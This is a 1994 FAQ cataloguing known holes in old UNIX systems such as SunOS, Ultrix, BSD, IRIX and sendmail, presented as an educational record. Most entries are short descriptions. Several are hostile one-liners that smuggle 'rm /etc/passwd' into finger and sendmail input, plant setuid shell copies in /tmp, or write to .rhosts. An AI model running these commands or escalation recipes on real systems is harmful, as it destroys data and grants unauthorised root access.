Hole Lists -- Cut to the chase, a list of known holes in UNIX. 94/12/13

From: HoleList FAQ
Subject: HoleList    v7    12/13/94

    These bugs/holes are archived only as a record of security related
    activity and are for educational purposes only.  This compilation
    is not meant to encourage malicious activity and is not intended
    to be a cookbook of cracking material.

    If you know of a hole or bug that is related to security and that is
    not listed in the following list, please contribute by sending E-Mail to
    <scott@spy.org>.

---

From: HoleList
Subject: Holes'n'Bugs
Date: 03/03/94

Operating System RVP   Date   Description (References)
================ === ======== ================================================
/bin/sh          1-- 12/12/94 IFS hole, vi ()
/bin/su          1--          overwrite stack somehow? ()
/dev/fb          1--          frame buffer devices readable/writeable ()
/dev/kmem        1--          /dev/kmem should not be o+w ()
/dev/mem         1--          /dev/mem should not be o+w ()
/dev/*st*, *mt*  1--          generally world readable/writeable ()
/etc             1--          rexd + MACH ? [NeXT] /etc/ g+w daemon ()
4.3 Tahoe        1--          chfn -- allows newlines/meta chars/bufsize ()
4.3 Tahoe        1--          ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;B:pw/uid;A:got pw ()
AIX ?            5++          setenv SHELL=/bin/sh; crontab -e; :!/bin/sh ()
AIX 2.2.1        1--          shadow password file o+w ()
AIX 3.1.5        5--          sendmail- mail to programs ()
AIX 3.2          5--          sendmail- mail to programs ()
AIX 3.2.4        5--          sendmail- mail to programs ()
AIX 3.2.5        5--          sendmail- mail to programs ()
AIX ?            1--          * password means use root's password? ()
AIX ?            1--          rexd- any can get root access if enabled ()
Amdahl UTS 2.0   1--          NFS mountd only uses hostname ()
AT&T SVR3.2.0    1--          Bad protected mode allows root if have sh + cc ()
A/UX 2.0.1       5--          lpr -s; 1000 calls lpr re-use fname ()
A/UX 2.0.1       5--          rdist(1) uses popen(3), IFS spoof ()
BellTech SYSV386 1--          ulimit 0; passwd  ==> zeros out passwd file ()
BSD 4.1          1--          Sendmail can mail directly to a file ()
BSD 4.1          1--          can mail directly to a file ()
BSD 4.1          1--          run set gid program, dump core, is set gid ()
BSD 4.1          1--          lock- compiled password "hasta la vista", + ^Z ()
BSD <4.2?        1--          IFS w. preserve bug in vi ()
BSD 4.1          1--          mail directly to a file ()
BSD 4.1          1--          exec sgid program, dump core, core is sgid ()
BSD 4.1          1--          Sendmail: can mail directly to a file ()
BSD 4.1          1--          lock password "hasta la vista" backdoor ()
BSD <4.2         1--          IFS w/ preserve bug w/vi ()
BSD <4.2         1--          suspend mkdir, ln file you want to dir ()
BSD <4.2?        1--          suspend mkdir, ln file you want to dir ()
BSD 4.2          1--          lock -- compiled in password "hasta la vista" ()
BSD 4.2          1--          ln passwd file to mail spool, mail to file ()
BSD 4.2          1--          can truncate read only files ()
BSD 4.2          1--          finger "string|/bin/rm -f /etc/passwd"@foo.bar ()
BSD 4.2          1--          ln -s target ~/.plan; finger user to read file ()
BSD 4.2          1--          lpr file; rm file; ln -s /any/filename file ()
BSD 4.2          1--          adb su; change check in memory; shell out ()
BSD 4.2          1--          race condition, can get root via "at" ()
BSD 4.2          1--          ln passwd file to mail spool, mail user ()
BSD 4.2          1--          ln -s target ~/.plan; finger user. ()
BSD 4.2          1--          adb su; change check in memory; shell out; su ()
BSD 4.2          1--          /dev/kmem and /dev/mem  should not be o+w ()
BSD 4.2          1--          signal any process by changing process group ()
BSD 4.3          1--          ftp -n; quote user ftp; etc.  Gets root privs. ()
BSD 4.3          1--          lpd can overwrite file ()
BSD 4.3          1--          ln -s /any/suid/file -i ; -i Get suid shell. ()
BSD 4.3          1--          fchown (2) can chown _any_ file ()
BSD 4.3          1--          race condition, get root via "at" ()
BSD 4.3          1--          passwd chokes on long lines, splits pw file ()
BSD 4.3          1--          ftp -n; quote user ftp; cd ~root, get root ()
BSD 4.3          1--          ln -s /any/suid/file -i ; -i Get suid shell ()
BSD 4.3          1--          race condition (expreserve?), root via "at" ()
BSD 4.3          5--          lpr -s; 1000 calls lpr re-use fname ()
BSD NET/2        5--          rdist(1) uses popen(3), IFS spoof ()
BSD NET/2        5--          lpr -s; 1000 calls lpr re-use fname ()
BSD ?            1--          Overwrite gets buffer -- fingerd, etc ()
BSD ?            1--          uudecode alias can overwrite root/daemon files ()
BSD ?            1--          /bin/mail ; !/bin/sh    Get uid=bin shell ()
BSD ?            1--          rwall bug ()
BSD ?            1--          adb the running kernel, shell out and get root ()
BSD ?            1--          sendmail can mail non-root file, try twice ()
BSD ?            1--          rshd -- spoof via nameservice, rsh target -l uid ()
BSD386           1--          mail"<u>;cp /bin/sh /tmp;chmod 6777 /tmp/sh" ()
buffer overrun   1--          chfn ()
chfn, chsh       1--          used to create a root account ()
chmod            1--          Incorrect file or directory permissions ()
comsat           1--          running as root, utmp o+w, writes to files ()
core             1--          will system dump a setgid core image? ()
decode           1--          decode mail alias - write non-root user files ()
DellSVR3.2/1.0.6 1--          Bad prot mode allows root if have sh + cc ()
denial           1--          easy to hog processor, memory, disc, tty, etc ()
DomainO/S <=10.3 1--          break root by using s/rbak; sgid/suid ()
DomainO/S <=10.4 5--          sendmail mail to programs ()
DNS              1--          SOA can control bogus reverse ip, rhosts ()
Domain/OS <10.3  1--          break root by using s/rbak; setgid/uid ()
DYNIX 3.0.14     1--          Sendmail -C file  ==> displays any file. ()
DYNIX 3.?        1--          can get root on NFS host via root via mountd ()
DYNIX 3.?        1--          on non-trusted host due to bug in mount daemon ()
DYNIX ?          1--          rsh <host> -l "" <command>   runs as root ()
DYNIX ?          1--          login: -r hostname ruser^@luser^@term^@ ()
elm              5--          ELM's autoreply can be used to get root ()
expreserve       1--          can be a huge hole ()
ESIX Rev. D      1--          Bad protected mode allows root if sh+cc ()
file mod test    1--          test file doesn't lose the suid when modified ()
fsck             1--          lost+found should be mode 700 ()
ftpd             1--          static passwd struct overwrite, wuftp < x.xx ()
ftpd 4.2         1--          userid not reset properly, "user root" ()
ftpd ?           1--          core files may contain password info ()
fchown           1--          test for bad group test ()
ftruncate        1--          can be used to change major/minor on devices ()
fingerd          1--          .plan hard-links - read files, fingerd ()
gopher           6--          Type=8 Name=shell Host=;/bin/sh Port= Path= ()
gnuemacs         1--          emacsclient/server allows access to files. ()
GN <1.19         4+-          exec0::/path/prog?var=blah%0Ahack-coomands0%A ()
HDB              1--          nostrangers shell escape ()
HDB              1--          changing the owner of set uid/gid files ()
HDB              1--          meta escapes on the X command line ()
HDB              1--          ; breaks on the X line ()
hosts.equiv      1--          default + entry ()
hosts.equiv      1--          easy to spoof by bad SOA at remote site ()
HPUX <7.0        1--          chfn -- allows newlines, etc ()
HP-UX            1--          sendmail:  mail directly to programs ()
HPUX A.09.01     1--          sendmail:  mail directly to programs ()
HPUX ?           1--          Sendmail: versions 1.2&13.1 sm, -oQ > ()
IDA 1.4.4.1      1--          :include:/some/unreadable/file in ~/.forward ()
ICMP             4--          various icmp attacks possible ()
ICMP             1--          ICMP redirect packets change non-static routes ()
Interactive 2.x  1--          Bad protected mode allows root if sh+cc ()
IRIX 3.3         1--          any user can read any other user's mail. ()
IRIX 3.3.1       1--          any user can read any other user's mail. ()
IRIX 3.3/3.31    1--          sendmail- any user can read other user's mail ()
IRIX 4.0.X       1--          default suid scripts ()
IRIX 4.0.X       1--          various $PATH problems ()
IRIX 4.0.X       1--          sendmail race condition hole ()
IRIX 4.0.X       1--          lpd is vulnerable too ()
IRIX ?           1--          rsh <host> -l "" <command>   runs as root ()
IRIX ?           1--          login: -r hostname ruser^@luser^@term^@ ()
IRIX ?           1--          Overwrite gets buffer -- fingerd, etc ()
IRIX ?           1--          uudecode alias can overwrite root/daemon files ()
IRIX ?           1--          /bin/mail ; !/bin/sh    Get uid=bin shell ()
IRIX ?           1--          rwall bug ()
IRIX ?           1--          adb the running kernel, shell out and get root ()
IRIX ?           1--          mail to any non-root owned file, try twice ()
IRIX ?           1--          rshd- spoof via dns - rsh target -l uid ()
IRIX ?           1--          xwsh log hole? (yo)
kernel           1--          Race conditions coupled with suid programs ()
lock             1--          4.1bsd version had password "hasta la vista" ()
lost+found       1--          lost+found should be mode 700 ()
lpd              1--          overwrite files with root authority ()
lpr              1--          lpr -r access testing problem ()
lpr              5--          lpr -s; 1000 calls lpr re-use fname ()
lprm             1--          trusts utmp ()
mount            1--          "mount" should not be +x for users. ()
mqueue           1--          must not be mode 777! ()
movemail         1--          worm? ()
Microport 3.0    1--          ulimit 0; passwd  ==> zeros out passwd file ()
network          1--          BSD network security based on "reserved ports" ()
news             1--          news receivers may execute shell commands ()
network          1--          kerberos ()
network          1--          Networks are usually very insecure. ()
NFS              1--          Many systems can be compromised with NFS/RPC. ()
NFS              1--          proxy rpc can read remote nfs files ()
NFS              1--          can generate NFS file handles ()
OSF/1 1.2        1--          write allows shell outs to gain egid term ()
OSF/1 1.3        1--          write allows shell outs to gain egid term ()
OSF/1 1.2        1--          doesn't close the fd to the term writing to ()
OSF/1 1.3        1--          doesn't close the fd to the term writing to ()
passwd           1--          fgets allows entries mangled into ::0:0::: ()
passwd           1--          fred:...:...:...:Fred ....Flintstone::/bin/sh ()
passwd           1--          IDs shouldn't contain: ;~!` M- spoof popen ()
portmap          1--          binding problems... ()
root             1--          ? (fingerd_test.sh)
rcp              1--          nobody problem ()
rexd             1--          existence ()
rexd             1--          MACH ? [NeXT] /etc/ g+w daemon ()
rdist            1--          buffer overflow ()
rdist            5--          rdist(1) uses popen(3), IFS spoof ()
RISC/os 4.51?    1--          rsh <host> -l "" <command>   runs as root ()
RPC              1--          Many systems can be compromised with NFS/RPC. ()
rwall            1--          running as root, utmp o+w, writes to files ()
SCO 3.2v4.2      5--          rdist(1) uses popen(3), IFS spoof ()
SCO ?            1--          rlogin to any acct to trusted host w/o pwd ()
SCO ?            1--          rlogin to any acct from trusted host w/o pwd ()
selection_svc    1--          allowed remote access to files ()
sendmail <x.x    1--          -bt -C/usr/spool/mail/user - reads file ()
sendmail <5.57   1--          from:<"|/bin/rm /etc/passwd">  && bounce mail ()
sendmail <=5.61  1--          can mail to any file not root owned, try twice ()
sendmail <5.61   1--          sendmail- groups incorrectly, get group ()
sendmail >5.65   1--          can get daemon privileges via .forward. ()
sendmail ?       5++          can mail to programs (sendmal1, nmh, smail)
sendmail ?       1--          debug option ()
sendmail ?       1--          wizard mode ()
sendmail ?       1--          TURN command allows mail to be stolen ()
sendmail ?       1--          decode mail alias - write non-root user files ()
sendmail ?       1--          buffer overflow causes sendmail daemon lock up ()
sendmail ?       1--          what uid does |program run with? ()
SIGNALS          1--          signal any process by changing process group ()
Stellix 2.0?     1--          rsh <host> -l "" <command>   runs as root ()
Stellix 2.0      1--          rsh <host> -l "" <command>   runs as root ()
Stellix 2.1      1--          login: -r hostname ruser^@luser^@term^@ ()
suid             1--          will run .profile if linked to - , IFS ()
suid             1--          never call system(3) and popen(3) ()
suid             1--          May not expect filesize signals, SIGALRMs ()
suid             1--          no setuid program on a mountable disk ()
suid             1--          ro mounting of foreign disk may allow suid. ()
suid             1--          .plan links ()
suid             1--          /usr/ucb/mail ~!cp /bin/sh /tmp/sh; chmod 2555 /tmp/sh ()
SunOS 3.3        1--          ftpd - userid not reset properly, "user root" ()
SunOS 3.5        1--          connect w/acct;user root;ls;put /tmp/f/ tmp/b ()
SunOS <4.0       1--          any user can run yp server ()
SunOS 4.0        1--          chsh -- similar to chfn ()
SunOS 386i       1--          rm logintool, hack login with adb, chmod 2750 ()
SunOS 386i/4.01? 1--          login -n root requires no password ()
SunOS 386i/4.01? 1--          login -n root (no password) ()
SunOS 4.0.1      1--          chfn buffer problems ()
SunOS 4.0.1      1--          chsh buffer problems ()
SunOS 4.0.1      1--          ypbind/ypserv, SunOS 4.0.1; need 3 machines ()
SunOS 4.0.3      1--          ypbind/ypserv, SunOS 4.0.1; need 3 machines ()
SunOS 4.0.3      1--          concurrent yppasswd sessions can trash yp map ()
SunOS 4.0.3      1--          mail to any non-root owned file, try twice ()
SunOS 4.0.3      1--          rcp buffer overflow ()
SunOS 4.0.3      1--          sendmail- mail to non-root file, try twice ()
SunOS 4.0.3      1--          ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;B:pw/uid;A:gets PW ()
SunOS 4.0.3      1--          uucico can show ph num, login, passwd, on remote machine ()
SunOS 4.0.3      1--          ypserv sends maps to anyone w/ domain (ypsnarf)
SunOS 4.0.?      1--          anyone can restore a file over any other file. ()
SunOS 4.0.?      1--          chfn -- allows newlines, meta chars, bufsize problem. ()
SunOS 4.0.?      1--          rcp with uid -2; only from PC/NFS. ()
SunOS 4.0.?      1--          ln -s /any/suid/file -i ; -i ()
SunOS 4.0.?      1--          selection_svc can remotely grab files. ()
SunOS 4.1        1--          rshd: spoof via nameservice, rsh target -l uid ()
SunOS 4.1        1--          shared libs accept relative paths w/ suid ()
SunOS 4.1        1--          sendmail: groups incorrectly checked, can get any group ()
SunOS 4.1        1--          comsat can overwrite any file ()
SunOS 4.1.x      1--          comsat can overwrite any file ()
SunOS 4.1.x      1--          ptrace allows to become root ()
SunOS 4.1.x      1--          openlook: telnet 2000; executive,x3, run ps int ()
SunOS <4.1.1     5--          lpr -s; 1000 calls lpr re-use fname ()
SunOS 4.1.2      5--          rdist(1) uses popen(3), IFS spoof ()
SunOS ?          1--          /usr/kvm/crash allows sh escapes group kmem ()
SunOS ?          1--          ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;B:pw/uid;A:gets PW ()
SunOS ?          1--          /dev/kmem and /dev/mem should not be o+w ()
SunOS ?          1--          rshd -- spoof via nameservice, rsh target -l uid ()
SunOS ?          1--          ftp -n; quote user ftp; etc.  Gets root privs. ()
SunOS ?          1--          symlink .plan to target file, finger user to read. ()
SunOS ?          1--          Overwrite gets buffer -- fingerd, etc.  (3.5)
SunOS ?          1--          rwall bug (<= 4.01 yes). ()
SunOS ?          1--          ptrace allows to become root ()
SunOS ?          4--          icmp errors not handled correctly ()
SunOS ?          1--          adb the running kernel, shell out and get root ()
SunOS ?          1--          ftp -n; quote user ftp; etc.  Gets root privs ()
SunOS ?          1--          lpd can overwrite file ()
SunOS ?          1--          the window manager can be used to read any file ()
SunOS ?          1--          rexd -- any can get root access if enabled ()
SunOS ?          1--          emacsclient/server allows access to files ()
SunOS ?          1--          openlook; telnet port 2000; executive,x3, runs PS interp ()
SunOS ?          1--          devinfo can be used to get group kmem ()
SunOS 5.1        1--          Symlinks are broken ()
syslogd          6--          buffer overrun, allows remote access ()
syslogd          1--          syslog messages used to overwrite any file ()
system           1--          system(3) even w/ setuid(getuid()) = IFS ()
SYSV <R4         1--          write to files; race condition w/ mkdir & ln ()
SYSV <R4         1--          expreserve problem/race condition ()
SYSV R?          1--          IFS, other environment at "login:" prompt ()
tcp/ip           1--          sequence number prediction allows spoofing ()
tcp/ip           1--          source routing makes host spoofing easier ()
tcp/ip           1--          rip allows one to capture traffic more easily ()
tcp/ip           4--          various icmp attacks possible ()
tftp             1--          puts/gets -- grab files, do chroot ()
traceroute       1--          allows one to easily dump packets onto net ()
ulimit           1--          passwd(1) leaves passwd locked if ulimit set ()
Ultrix 2.0?      1--          sendmail- 1.2&13.1 sm, -oQ > can r/w any ()
Ultrix 2.0?      1--          Sendmail -C file  ==> displays any file. ()
Ultrix 2.2?      1--          Sendmail -C file  ==> displays any file. ()
Ultrix 2.2       1--          ln passwd file to mail spool, mail to user ()
Ultrix 2.2       1--          on a non-trusted host due to bug in mountd ()
Ultrix 2.2       1--          Sendmail: -C file  ==> displays any file ()
Ultrix 2.2       1--          can get root on NFS host via root via mountd ()
Ultrix 2.2       1--          get root on host running NFS from other root ()
Ultrix 3.0       1--          lock -- compiled in password "hasta la vista" ()
Ultrix 3.0       1--          login -P progname allows run programs as root ()
Ultrix 3.0       1--          login can run any program with root privs ()
Ultrix 3.0       1--          ln -s target ~/.plan; finger user to access ()
Ultrix 3.0       1--          any user can mount any filesystem ()
Ultrix 3.0       1--          X11 doesn't clear pwds in mem; /dev/mem is o+w ()
Ultrix <3.1      1--          limit file 0; passwd -->zeros out passwd file ()
Ultrix <3.1      1--          lpd can overwrite any file (back to 2.0?) ()
Ultrix 3.1?      1--          rshd: spoof via nameservice, rsh target -l uid ()
Ultrix 3.1?      1--          allows newlines, meta chars, buffsize problem ()
Ultrix <4.1      1--          overflow RISC reg buffer, get root w/ mail ()
Ultrix ?         1--          rshd -- spoof via dns, rsh target -l uid ()
Ultrix ?         1--          ypbind takes ypset from all; spoof yp DB ()
Ultrix ?         1--          yppasswd leaves yp data files world writable ()
Ultrix ?         1--          chfn -- allows newlines, meta chars, bufsize ()
Ultrix ?         1--          ftp -n; quote user ftp; etc.  Gets root privs ()
Ultrix ?         1--          can change host name, mount any filesystem ()
Ultrix ?         1--          uudecode alias can overwrite root/daemon files ()
Ultrix ?         4--          ICMP not handled correctly (nuke)
Ultrix ?         1--          emacsclient/server allows access to files ()
Ultrix ?         1--          lock: password "hasta la vista" backdoor ()
Ultrix ?         1--          /dev/kmem and /dev/mem should not be o+w ()
Ultrix ?         1--          can change physical ethernet address ()
UNIX             1--          / must not be go+w ()
utmp             1--          /etc/utmp o+w ? ()
utmp             1--          check to see if world writeable (rwall, comsat)
utmp             1--          syslog messages can overwrite any file ()
uucp             1--          check valid UUCP accts in /etc/ftpusers ()
uucp             1--          echo "myhost myname">x;uucp x ~uucp/.rhosts ()
uucp             1--          uucico shows ph num, login, passwd, of remote ()
uudecode         1--          if it is setuid, may create setuid files ()
uusend           1--          uusend may call "uux" while suid to root ()
uux              1--          uusend may call "uux" while suid to root ()
X11R?            1--          snoop on keyboards and bitmaps ()
X11R3            1--          can set log on and exec (fixed in "fix-6")
X11R4            1--          can set log on and exec (fixed in "fix-6")
X11R ?           1--          snoop on keyboards and bitmaps ()
X11R5            5++          xterm can create files (xterm1__)
xhost            1--          if + , anyone can connect to X server ()
ypbind           1--          accepts ypset from anyone ()
